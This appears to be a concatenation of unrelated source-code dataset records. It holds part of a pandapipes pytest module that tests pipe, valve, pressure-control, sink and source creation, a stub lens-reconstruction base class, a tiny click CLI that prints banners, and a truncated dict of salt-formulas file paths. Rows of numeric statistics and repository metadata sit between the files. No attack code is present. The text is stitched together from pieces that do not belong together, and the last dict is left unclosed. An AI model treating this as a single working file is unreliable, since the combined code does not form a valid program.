        # "in_service" is actually a numpy.bool_, but == comparison still holds
        assert net.pipe.at[p[0], col] == expected
        assert net.pipe.at[p[1], col] == expected
    assert net.pipe_geodata.at[p[0], "coords"] == [(10, 10), (20, 20)]
    assert net.pipe_geodata.at[p[1], "coords"] == [(10, 10), (20, 20)]

    # parameters as arrays -> element-wise; the diameter still comes from the std type
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    p = pandapipes.create_pipes(
        net, [j1, j1], [j2, j2], std_type="80_GGG", length_km=[1, 5], in_service=[True, False],
        geodata=[[(10, 10), (20, 20)], [(100, 10), (200, 20)]], name=["p1", "p2"],
        k_mm=[0.01, 0.02], loss_coefficient=[0.3, 0.5], sections=[1, 2],
        alpha_w_per_m2k=[0.1, 0.2], text_k=[273, 274], qext_w=[0.01, 0.02])
    assert len(net.pipe) == 2
    assert len(net.pipe_geodata) == 2
    array_expectations = {
        "length_km": [1, 5], "in_service": [True, False], "name": ["p1", "p2"],
        "std_type": ["80_GGG", "80_GGG"], "diameter_m": [0.086, 0.086],
        "k_mm": [0.01, 0.02], "loss_coefficient": [0.3, 0.5],
        "alpha_w_per_m2k": [0.1, 0.2], "sections": [1, 2], "text_k": [273, 274],
        "qext_w": [0.01, 0.02]}
    for col, (first, second) in array_expectations.items():
        assert net.pipe.at[p[0], col] == first
        assert net.pipe.at[p[1], col] == second
    assert net.pipe_geodata.at[p[0], "coords"] == [(10, 10), (20, 20)]
    assert net.pipe_geodata.at[p[1], "coords"] == [(100, 10), (200, 20)]
def test_create_pipes_raise_except(create_empty_net):
    """Check the expected warnings for bad junctions and duplicate pipe indices."""
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    j3 = pandapipes.create_junction(net, 3, 273)
    # keyword arguments shared by every creation attempt below
    common = dict(std_type="80_GGG", length_km=5, in_service=False,
                  geodata=[(10, 10), (20, 20)], name="test", k_mm=0.01,
                  loss_coefficient=0.3, sections=2, alpha_w_per_m2k=0.1,
                  text_k=273, qext_w=0.01)
    # junctions 4 and 5 do not exist
    with pytest.raises(UserWarning, match=r"trying to attach to non existing junctions"):
        pandapipes.create_pipes(net, [1, 3], [4, 5], **common)
    # first creation with explicit indices succeeds ...
    pandapipes.create_pipes(net, [j1, j1], [j2, j3], index=[0, 1], **common)
    # ... repeating the same indices must fail
    with pytest.raises(UserWarning, match=r"with indexes \[0 1\] already exist"):
        pandapipes.create_pipes(net, [j1, j1], [j2, j3], index=[0, 1], **common)
def test_create_valves(create_empty_net):
    """Check vectorized valve creation (scalar, array, and explicit index input)."""
    # standard call
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    pandapipes.create_valves(net, [j1, j1], [j2, j2], 0.2)
    assert len(net.valve) == 2
    assert len(set(net.valve.diameter_m)) == 1
    assert np.all(net.valve.diameter_m == [0.2, 0.2])

    # parameters as single values (incl. a user-defined column) -> broadcast
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    v = pandapipes.create_valves(
        net, [j1, j1], [j2, j2], diameter_m=0.8, opened=False, name="test", new_col=0.01,
        loss_coefficient=0.3, type="v")
    assert len(net.valve) == 2
    scalar_expectations = {"opened": False, "name": "test", "type": "v",
                           "new_col": 0.01, "loss_coefficient": 0.3}
    for col, expected in scalar_expectations.items():
        # "opened" is actually a numpy.bool_, but == comparison still holds
        assert net.valve.at[v[0], col] == expected
        assert net.valve.at[v[1], col] == expected

    # parameters as arrays -> element-wise
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    v = pandapipes.create_valves(
        net, [j1, j1], [j2, j2], diameter_m=[0.8, 0.7], opened=[True, False], name=["v1", "v2"],
        type=["va1", "va2"], loss_coefficient=[0.3, 0.5], new_col=[0.01, 1.9])
    assert len(net.valve) == 2
    array_expectations = {"opened": [True, False], "name": ["v1", "v2"],
                          "type": ["va1", "va2"], "diameter_m": [0.8, 0.7],
                          "new_col": [0.01, 1.9], "loss_coefficient": [0.3, 0.5]}
    for col, (first, second) in array_expectations.items():
        assert net.valve.at[v[0], col] == first
        assert net.valve.at[v[1], col] == second

    # explicit index
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    v = pandapipes.create_valves(
        net, [j1, j1], [j2, j2], diameter_m=[0.8, 0.7], opened=[True, False], name=["v1", "v2"],
        type=["va1", "va2"], loss_coefficient=[0.3, 0.5], new_col=[0.01, 1.9], index=[1, 5])
    assert len(net.valve) == 2
    assert np.all(v == [1, 5])
    assert np.all(net.valve.index == [1, 5])
def test_create_valves_raise_except(create_empty_net):
    """Check the expected warnings for bad junctions and duplicate valve indices."""
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    j3 = pandapipes.create_junction(net, 3, 273)
    # keyword arguments shared by every creation attempt below
    common = dict(diameter_m=0.8, opened=False, name="test", loss_coefficient=0.3)
    # junctions 4 and 5 do not exist
    with pytest.raises(UserWarning, match=r"trying to attach to non existing junctions"):
        pandapipes.create_valves(net, [1, 3], [4, 5], **common)
    # first creation with explicit indices succeeds ...
    pandapipes.create_valves(net, [j1, j1], [j2, j3], index=[0, 1], **common)
    # ... repeating the same indices must fail
    with pytest.raises(UserWarning, match=r"with indexes \[0 1\] already exist"):
        pandapipes.create_valves(net, [j1, j1], [j2, j3], index=[0, 1], **common)
def test_create_pressure_controls(create_empty_net):
    """Check vectorized pressure control creation (scalar, array, explicit index)."""
    # standard call
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    pandapipes.create_pressure_controls(net, [j1, j1], [j2, j2], [j2, j2], 3)
    assert len(net.press_control) == 2
    assert len(set(net.press_control.controlled_p_bar)) == 1
    assert np.all(net.press_control.controlled_p_bar == [3, 3])

    # parameters as single values (incl. a user-defined column) -> broadcast
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    pc = pandapipes.create_pressure_controls(net, [j1, j1], [j2, j2], [j2, j2],
                                             controlled_p_bar=3, in_service=False,
                                             name="test", new_col=0.01, type="pc")
    assert len(net.press_control) == 2
    scalar_expectations = {
        "from_junction": j1, "to_junction": j2, "controlled_junction": j2,
        "in_service": False, "name": "test", "type": "pc", "new_col": 0.01,
        "controlled_p_bar": 3}
    for col, expected in scalar_expectations.items():
        # "in_service" is actually a numpy.bool_, but == comparison still holds
        assert net.press_control.at[pc[0], col] == expected
        assert net.press_control.at[pc[1], col] == expected

    # parameters as arrays -> element-wise
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    pc = pandapipes.create_pressure_controls(
        net, [j1, j1], [j2, j2], [j2, j2], controlled_p_bar=[3, 2.9], in_service=[True, False],
        name=["test1", "test2"], new_col=[0.01, 0.1], type=["pc1", "pc2"])
    assert len(net.press_control) == 2
    array_expectations = {
        "from_junction": [j1, j1], "to_junction": [j2, j2],
        "controlled_junction": [j2, j2], "in_service": [True, False],
        "name": ["test1", "test2"], "type": ["pc1", "pc2"], "new_col": [0.01, 0.1],
        "controlled_p_bar": [3, 2.9]}
    for col, (first, second) in array_expectations.items():
        assert net.press_control.at[pc[0], col] == first
        assert net.press_control.at[pc[1], col] == second

    # explicit index
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    pc = pandapipes.create_pressure_controls(
        net, [j1, j1], [j2, j2], [j2, j2], controlled_p_bar=[3, 2.9], in_service=[True, False],
        name=["test1", "test2"], new_col=[0.01, 0.1], type=["pc1", "pc2"], index=[1, 5])
    assert len(net.press_control) == 2
    assert np.all(pc == [1, 5])
    assert np.all(net.press_control.index == [1, 5])
def test_create_pressure_controls_raise_except(create_empty_net):
    """Check the expected warnings for bad junctions and duplicate indices."""
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    j3 = pandapipes.create_junction(net, 3, 273)
    # keyword arguments shared by every creation attempt below
    common = dict(controlled_p_bar=3, in_service=False, name="test")
    # junctions 4 and 5 do not exist
    with pytest.raises(UserWarning, match=r"trying to attach to non existing junctions"):
        pandapipes.create_pressure_controls(net, [1, 3], [4, 5], [4, 5], **common)
    # first creation with explicit indices succeeds ...
    pandapipes.create_pressure_controls(net, [j1, j1], [j2, j3], [j1, j3], index=[0, 1],
                                        **common)
    # ... repeating the same indices must fail
    with pytest.raises(UserWarning, match=r"with indexes \[0 1\] already exist"):
        pandapipes.create_pressure_controls(net, [j1, j1], [j2, j3], [j1, j3], index=[0, 1],
                                            **common)
def test_create_sinks(create_empty_net):
    """Check vectorized sink creation including a user-defined extra column."""
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    j3 = pandapipes.create_junction(net, 3, 273)
    pandapipes.create_sinks(
        net, junctions=[j1, j2, j3], mdot_kg_per_s=[0, 0.1, 0.2], scaling=[1., 1., 0.5],
        name=["sink%d" % s for s in range(3)], new_col=[1, 3, 5])
    # per-row expectations: (junction, mass flow, scaling)
    for row, (junction, mdot, scaling) in enumerate(
            [(j1, 0, 1), (j2, 0.1, 1), (j3, 0.2, 0.5)]):
        assert net.sink.junction.at[row] == junction
        assert net.sink.mdot_kg_per_s.at[row] == mdot
        assert net.sink.scaling.at[row] == scaling
    assert all(net.sink.in_service.values == True)
    assert all(net.sink.type.values == "sink")
    assert all(net.sink.new_col.values == [1, 3, 5])
def test_create_sinks_raise_except(create_empty_net):
    """Check the expected warnings for bad junctions and duplicate sink indices."""
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    j3 = pandapipes.create_junction(net, 3, 273)
    # keyword arguments shared by every creation attempt below
    common = dict(mdot_kg_per_s=[0, 0.1, 0.2], scaling=[1., 1., 0.5],
                  name=["sink%d" % s for s in range(3)], new_col=[1, 3, 5])
    # junctions 3, 4 and 5 do not exist
    with pytest.raises(UserWarning,
                       match=r"Cannot attach to junctions \{3, 4, 5\}, they do not exist"):
        pandapipes.create_sinks(net, junctions=[3, 4, 5], **common)
    # first creation succeeds ...
    sg = pandapipes.create_sinks(net, junctions=[j1, j2, j3], **common)
    # ... reusing the returned indices must fail
    with pytest.raises(UserWarning, match=r"Sinks with indexes \[0 1 2\] already exist."):
        pandapipes.create_sinks(net, junctions=[j1, j2, j3], index=sg, **common)
def test_create_sources(create_empty_net):
    """Check vectorized source creation including a user-defined extra column."""
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    j3 = pandapipes.create_junction(net, 3, 273)
    pandapipes.create_sources(
        net, junctions=[j1, j2, j3], mdot_kg_per_s=[0, 0.1, 0.2], scaling=[1., 1., 0.5],
        name=["source%d" % s for s in range(3)], new_col=[1, 3, 5])
    # per-row expectations: (junction, mass flow, scaling)
    for row, (junction, mdot, scaling) in enumerate(
            [(j1, 0, 1), (j2, 0.1, 1), (j3, 0.2, 0.5)]):
        assert net.source.junction.at[row] == junction
        assert net.source.mdot_kg_per_s.at[row] == mdot
        assert net.source.scaling.at[row] == scaling
    assert all(net.source.in_service.values == True)
    assert all(net.source.type.values == "source")
    assert all(net.source.new_col.values == [1, 3, 5])
def test_create_sources_raise_except(create_empty_net):
    """Check the expected warnings for bad junctions and duplicate source indices."""
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    j3 = pandapipes.create_junction(net, 3, 273)
    # keyword arguments shared by every creation attempt below
    common = dict(mdot_kg_per_s=[0, 0.1, 0.2], scaling=[1., 1., 0.5],
                  name=["source%d" % s for s in range(3)], new_col=[1, 3, 5])
    # junctions 3, 4 and 5 do not exist
    with pytest.raises(UserWarning,
                       match=r"Cannot attach to junctions \{3, 4, 5\}, they do not exist"):
        pandapipes.create_sources(net, junctions=[3, 4, 5], **common)
    # first creation succeeds ...
    sg = pandapipes.create_sources(net, junctions=[j1, j2, j3], **common)
    # ... reusing the returned indices must fail
    with pytest.raises(UserWarning, match=r"Sources with indexes \[0 1 2\] already exist."):
        pandapipes.create_sources(net, junctions=[j1, j2, j3], index=sg, **common)
# Allow running this test module directly (python test_create.py) without
# invoking pytest from the command line.
if __name__ == '__main__':
    pytest.main(["test_create.py"])
| 46.512164 | 100 | 0.622915 | 5,828 | 36,326 | 3.724605 | 0.037062 | 0.086239 | 0.06468 | 0.063574 | 0.936242 | 0.916386 | 0.871378 | 0.847284 | 0.8266 | 0.806053 | 0 | 0.074727 | 0.204647 | 36,326 | 780 | 101 | 46.571795 | 0.676589 | 0.034851 | 0 | 0.656693 | 0 | 0 | 0.074737 | 0 | 0 | 0 | 0 | 0 | 0.445669 | 1 | 0.03937 | false | 0 | 0.006299 | 0.001575 | 0.047244 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6a1c572d3ec49dcba950e67e15ee128c2c0c7c8b | 1,751 | py | Python | lenstronomywrapper/LensSystem/lens_reconstruct_base.py | dangilman/LenstronomyWrapper | 7c3bb68ab1f982432cd16d570854df50466491e9 | [
"MIT"
] | null | null | null | lenstronomywrapper/LensSystem/lens_reconstruct_base.py | dangilman/LenstronomyWrapper | 7c3bb68ab1f982432cd16d570854df50466491e9 | [
"MIT"
] | null | null | null | lenstronomywrapper/LensSystem/lens_reconstruct_base.py | dangilman/LenstronomyWrapper | 7c3bb68ab1f982432cd16d570854df50466491e9 | [
"MIT"
] | null | null | null | class ReconstructBase(object):
def __init__(self):
pass
@property
def concentric_with_lens_light(self):
raise Exception('linked lens light with lens model not implemented for this class')
@property
def concentric_with_lens_model(self):
raise Exception('linked lens model with lens model not implemented for this class')
@property
def n_models(self):
return len(self.light_model_list)
@property
def light_model_list(self):
raise NotImplementedError('Source reconstruction not yet implemented for this source class.')
@property
def fixed_models(self):
return NotImplementedError('Source reconstruction not yet implemented for this source class.')
@property
def param_init(self):
raise NotImplementedError('Source reconstruction not yet implemented for this source class.')
@property
def param_sigma(self):
raise NotImplementedError('Source reconstruction not yet implemented for this source class.')
@property
def param_lower(self):
raise NotImplementedError('Source reconstruction not yet implemented for this source class.')
@property
def param_upper(self):
raise NotImplementedError('Source reconstruction not yet implemented for this source class.')
@property
def lens_model_list(self):
raise NotImplementedError('Source reconstruction not yet implemented for this source class.')
@property
def redshift_list(self):
raise NotImplementedError('Source reconstruction not yet implemented for this source class.')
@property
def kwargs(self):
raise NotImplementedError('Source reconstruction not yet implemented for this source class.')
| 33.037736 | 102 | 0.723587 | 203 | 1,751 | 6.128079 | 0.17734 | 0.106109 | 0.159164 | 0.303859 | 0.860932 | 0.778135 | 0.778135 | 0.778135 | 0.778135 | 0.778135 | 0 | 0 | 0.213592 | 1,751 | 52 | 103 | 33.673077 | 0.903413 | 0 | 0 | 0.512821 | 0 | 0 | 0.402056 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0.025641 | 0 | 0.051282 | 0.410256 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6a455fb52c79b20dc2efc8616a9b47b71609fc6f | 478 | py | Python | autoT.py | kshamashuttl/Test15071993 | 8ad0f810de2a70397f985f12da728b97de976086 | [
"MIT"
] | null | null | null | autoT.py | kshamashuttl/Test15071993 | 8ad0f810de2a70397f985f12da728b97de976086 | [
"MIT"
] | null | null | null | autoT.py | kshamashuttl/Test15071993 | 8ad0f810de2a70397f985f12da728b97de976086 | [
"MIT"
] | null | null | null | import click
# Root command group; subcommands (e.g. ``runner``) attach via @cli.command().
@click.group()
def cli():
    """Command Line tool to access Drone.io API"""
    # Group entry point only dispatches to subcommands; no work of its own.
    pass
@cli.command()
def runner():
    # Placeholder subcommand: prints "Test" framed by asterisk banner lines.
    # One shared literal guarantees all four frame lines are identical.
    frame = "********************************************************************"
    for line in (frame, frame, "Test", frame, frame):
        print(line)
| 28.117647 | 81 | 0.23431 | 25 | 478 | 4.48 | 0.68 | 0.267857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110879 | 478 | 16 | 82 | 29.875 | 0.263529 | 0.083682 | 0 | 0.363636 | 0 | 0 | 0.638889 | 0.62963 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | true | 0.090909 | 0.090909 | 0 | 0.272727 | 0.454545 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 8 |
dbf2716a5c42d7999d7dee0437be8bf46e679d85 | 107,427 | py | Python | tests/good_modules.py | h4ck3rm1k3/salt-formulas | 8b0265faa64fa1d2a4149ce9aeb279e3861150fd | [
"CC0-1.0"
] | 5 | 2015-01-26T20:52:54.000Z | 2019-06-18T06:48:55.000Z | tests/good_modules.py | h4ck3rm1k3/salt-formulas | 8b0265faa64fa1d2a4149ce9aeb279e3861150fd | [
"CC0-1.0"
] | 1 | 2015-01-06T10:54:00.000Z | 2015-01-06T10:54:00.000Z | tests/good_modules.py | h4ck3rm1k3/salt-formulas | 8b0265faa64fa1d2a4149ce9aeb279e3861150fd | [
"CC0-1.0"
] | 4 | 2015-01-19T16:39:48.000Z | 2020-11-04T05:52:02.000Z | good_modules={'/mnt/data/home/mdupont/experiments/salt-formulas/AFPy_salt-fr/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_modules/glance': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_modules/ini_manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_modules/keystone': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_modules/linux_lvm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_modules/neutron': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_modules/parted': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_modules/parted_free_disks': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_states/glance': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_states/ini_manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_states/keystone': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_states/lvm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/CSSCorp_openstack-automation/file_root/_states/neutron': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Cantemo_python27-saltstack-formula/python27/files/ez_setup': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ConsumerAffairs_salt-states/bin/nacl': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ConsumerAffairs_salt-states/docs/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ConsumerAffairs_salt-states/opt/graphite/webapp/graphite/local_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ConsumerAffairs_salt-states/usr/local/bin/celery_task_queues': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ConsumerAffairs_salt-states/usr/local/bin/check_elasticsearch': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ConsumerAffairs_salt-states/usr/local/bin/check_rackspace_cloudfiles': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/DanielBryan_salt-state-graph/salt-state-graph': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/FleetingClouds_SaltStackToolSet/gdata_oerp_pump/srv/salt/gdata_oerp_pump/creds_oa': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Gohan_salt-state/tools/python27/get-pip': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Grokzen_salty-windows/states/winreg': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Ins1ne_salt-states/salt/_modules/deploy': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Ins1ne_salt-states/salt/_runners/carbonmon': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Ins1ne_salt-states/salt/app/database_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/JustinCarmony_vagrant-cloud/saltstack/salt/_modules/zombie': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Korrigan_pepperstack/pepperstack/commands/mixins': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Korrigan_pepperstack/pepperstack/utils': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Korrigan_pepperstack/pepperstack/utils/cred': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Korrigan_pepperstack/pepperstack/utils/db': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Korrigan_pepperstack/pepperstack/utils/exceptions': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Korrigan_pepperstack/pepperstack/utils/format': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Korrigan_pepperstack/salt_ext_modules/pillar/pepperstack': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KrisSaxton_salt-ldap/auth/ldap': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KrisSaxton_salt-ldap/modules/ldap': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KrisSaxton_salt-ldap/pillar/pillar_ldap': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KyleBenson_SmartAmericaSensors/scale_client/device_descriptor': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KyleBenson_SmartAmericaSensors/scale_client/publisher': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KyleBenson_SmartAmericaSensors/scale_client/sensed_event': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KyleBenson_SmartAmericaSensors/scale_client/virtual_csn_server': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KyleBenson_SmartAmericaSensors/scale_client/virtual_csn_server/import_fixer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KyleBenson_SmartAmericaSensors/scale_client/virtual_csn_server/messages': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KyleBenson_SmartAmericaSensors/scale_client/virtual_csn_server/util': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KyleBenson_SmartAmericaSensors/scale_client/virtual_sensor': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/KyleBenson_SmartAmericaSensors/temperature/tempy': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker.old/errors': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker.old/unixconn': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker.old/unixconn/unixconn': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker.old/utils/utils': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker.old/version': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker/errors': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker/ssladapter': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker/ssladapter/ssladapter': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker/unixconn': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker/unixconn/unixconn': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/docker/version': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/mock': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/certs': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/hooks': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/big5freq': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/chardetect': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/compat': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/constants': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/euckrfreq': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/euctwfreq': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/gb2312freq': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/jisfreq': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/langbulgarianmodel': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/langcyrillicmodel': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/langgreekmodel': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/langhebrewmodel': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/langhungarianmodel': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/chardet/langthaimodel': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/urllib3': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/urllib3/contrib': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/urllib3/exceptions': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/urllib3/packages': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/urllib3/packages/ordered_dict': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/urllib3/packages/six': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/packages/urllib3/packages/ssl_match_hostname': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/requests/structures': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/six': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/libs/websocket': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/mod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/mod/common': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/mod/linux': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/mod/meta': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/mod/windows': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/auth': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/auth/auto': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/auth/keystone': 1,
